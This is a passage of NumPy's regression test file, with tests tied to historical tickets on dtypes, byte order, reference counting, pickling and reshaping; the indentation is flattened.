descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
"""Ticket #67"""
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
"""Ticket #72"""
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
"""Ticket #79"""
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua2 = ua.newbyteorder()
def test_object_array_fill(self,level=rlevel):
"""Ticket #86"""
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
"""Ticket #93"""
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
"""Ticket #99"""
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
"""Ticket #105"""
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a>2) & (a<6))
xb = np.where((b>2) & (b<6))
ya = ((a>2) & (a<6))
yb = ((b>2) & (b<6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
"""GitHuB issue #369"""
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
"""Ticket #2185"""
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
"""Ticket #106"""
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
"""Ticket #111"""
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
# Longfloat support is not consistent enough across
# platforms for this test to be meaningful.
# def test_longfloat_repr(self,level=rlevel):
# """Ticket #112"""
# if np.longfloat(0).itemsize > 8:
# a = np.exp(np.array([1000],dtype=np.longfloat))
# assert_(str(a)[1:9] == str(a[0])[:8])
def test_argmax(self,level=rlevel):
"""Ticket #119"""
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
aargmax = a.argmax(i)
def test_mem_divmod(self,level=rlevel):
"""Ticket #126"""
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
"""Ticket #128"""
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
"""Ticket #133"""
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
"""Ticket #143"""
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
"""Ticket #151"""
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
"""Ticket #160"""
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
"""Ticket #190"""
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tostring_FORTRANORDER_discontiguous(self,level=rlevel):
"""Fix in r2836"""
# Create discontiguous Fortran-ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tostring()))
def test_flat_assignment(self,level=rlevel):
"""Correct behaviour of ticket #194"""
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
"""Ticket #194"""
x = np.empty((3, 1))
def bfa(): x[:] = np.arange(3)
def bfb(): x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for nonarray assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
"""Implemented in r2840"""
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
"""Ticket #196"""
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
"""Ticket #202"""
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
"""Ticket #205"""
tmp = np.array([])
def index_tmp(): tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
"""Ticket #222"""
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
"""Ticket #239"""
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
"""Ticket #243"""
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
"""Ticket #246"""
x = np.char.array(("x", "x ", "x "))
for c in x: assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
"""Lexsort memory error"""
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_pickle_dtype(self,level=rlevel):
"""Ticket #251"""
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
"""Ticket #265"""
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
"""Ticket #270"""
a = np.array([1, 'A', None])
def test_multiple_assign(self, level=rlevel):
"""Ticket #273"""
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1= ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
assert_(abs(arr-res2).max() < 1e-8, func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
"""Ticket #298"""
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
"""Ticket #302"""
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
"""Ticket #312"""
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
"""Ticket #322"""
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
"""Ticket #324"""
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
"""Issue #465 and related checks"""
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
"""Ticket #327"""
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
"""Ticket #330"""
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
"""Ticket #334"""
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
"""Ticket #335"""
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
"""Ticket #341"""
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
"""Ticket #342"""
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
"""Ticket #344"""
dt1=np.dtype(('uint32', 2))
dt2=np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
"""Make sure reshape order works."""
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
"""Issue #380, test reshaping of zero strided arrays"""
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
"""Github Issue #2700, setting shape failed for 0-sized arrays"""
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# Github issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
"""Ticket #352"""
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
"""Make sure optimization is not called in this case."""
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a==3)], a2[np.where(a2==3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
"""Ticket #372"""
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
"""Ticket #374"""
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
"""Changeset #3443"""
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
"""Ticket #413"""
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
"""Convolve should raise an error for empty input array."""
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
"""Ticket #449"""
r=np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
"""Changeset 3557"""
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
"""Ticket #483"""
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
"""Ensure that 'take' honours output parameter."""
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
"""Ticket #501"""
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
sstr = np.array_str(s)
def test_frompyfunc_endian(self, level=rlevel):
"""Ticket #503"""
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
"""Ticket #514"""
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s ))
def test_arr_transpose(self, level=rlevel):
"""Ticket #516"""
x = np.random.rand(*(2,)*16)
y = x.transpose(list(range(16)))
def test_string_mergesort(self, level=rlevel):
"""Ticket #540"""
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
"""Ticket #546"""
a = np.arange(3, dtype='>f')
assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
"""Ticket #555"""
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
"""Ticket #562"""
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
"""Ticket #588"""
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
"""Ticket #600"""
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
"""Ticket #616"""
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v): x[(s>0)]=v
self.assertRaises(ValueError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x, s, np.zeros(11, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
"""Ticket #603"""
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
"""Check argsort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
"""Check sort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
"""Ticket #657"""
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel) :
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
assert_equal(str(np.abs(x)), '[ 0. 0. 0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
"""Ticket #771: strides are not set correctly when reshaping 0-sized
arrays"""
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
"""Ticket #633"""
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1d broadcasted slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1d -> 2d broadcasted slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr3 = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
arr3 = arr1.repeat(3, axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3*5)
arr3 = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
arr3 = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
def test_mem_custom_float_to_array(self, level=rlevel):
"""Ticket 702"""
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp2 = tmp.astype(float)
def test_object_array_refcount_self_assign(self, level=rlevel):
"""Ticket #711"""
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
"""Ticket #713"""
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
"""Ticket #714"""
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
"""Ticket #640, floats from string"""
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
""" Non-native endian arrays were incorrectly filled with scalars before
r5034.
"""
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
"""Test for ticket #551, changeset r5140"""
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
# y is now typically not aligned on a 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
"""Ticket #788, changeset r5155"""
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
"""Ticket #789, changeset 5217.
"""
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype = np.single)
try:
a.compress([True, False], axis = 1, out = b)
raise AssertionError("compress with an out which cannot be " \
"safely casted should not return "\
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
"""Ticket #791
"""
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.nonzero()[0].info == 'jubba')
assert_(dat.nonzero()[1].info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
